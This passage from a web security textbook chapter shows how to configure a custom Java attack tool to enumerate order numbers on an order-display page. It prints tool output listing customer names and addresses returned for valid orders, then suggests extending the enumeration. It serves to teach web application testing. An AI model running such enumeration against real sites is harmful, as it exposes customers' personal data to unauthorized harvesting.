Chapter 13  ■ Automating Bespoke Attacks

That is all we need to change within the tool’s actual code. To configure JAt-

tack to target the actual request in which we are interested, we need to update

its attack configuration as follows:

String method = “POST”;

String url = “/ShowOrder.jsp”;

Param[] params = new Param[] 

{

new Param(“SessionId”, “21298FE012EEA892981”, Param.Type.COOKIE, false),

new Param(“OrderRef”, “1003073781”, Param.Type.BODY, true),

new Param(“OrderType”, “retail”, Param.Type.BODY, false),

};

PayloadSource payloads = new PSNumbers(1003073700, 1003073800, 1);

This configuration instructs JAttack to make 

POST

requests to the relevant

URL, containing the three required parameters. Only one of these will actually

be modified, using the range of potential order numbers specified.

When we now run JAttack, we obtain the following output:

OrderRef  1003073700   500   300

OrderRef  1003073701   500   300

...

OrderRef  1003073773   500   300

OrderRef  1003073774   200   27489     P Orac          13, Fairyland St

OrderRef  1003073775   200   28991     S Hammad        1, Stews Place

OrderRef  1003073776   200   29430     Adam Matthews   Flat 12a, G Community

OrderRef  1003073777   200   28224     Mike Kemp       6, Carshalton Rd

OrderRef  1003073778   200   28171     Martin Murfitt  Jn15, South Circular

OrderRef  1003073779   200   27880     D Senior        The Old Doss House

OrderRef  1003073780   200   28901     Ian Peters      Penthouse Suite

OrderRef  1003073781   200   27388     Phill Bellend   52, Throwley Way

OrderRef  1003073782   500   300

OrderRef  1003073783   500   300

...

As you can see, the attack was successful and captured the personal details

of some customers. It appears that when an invalid order number is submit-

ted, the server encounters an error and a 500 response code is returned. It also

appears that none of the order numbers below 1003073774 were valid. This

suggests that only eight orders have been placed today, and the order numbers

we should target are 0903073773 and below. By writing a quick custom pay-

load source for JAttack, we could generate payloads automatically, using the

scheme employed by the application.

Download 5,76 Mb.

Do'stlaringiz bilan baham: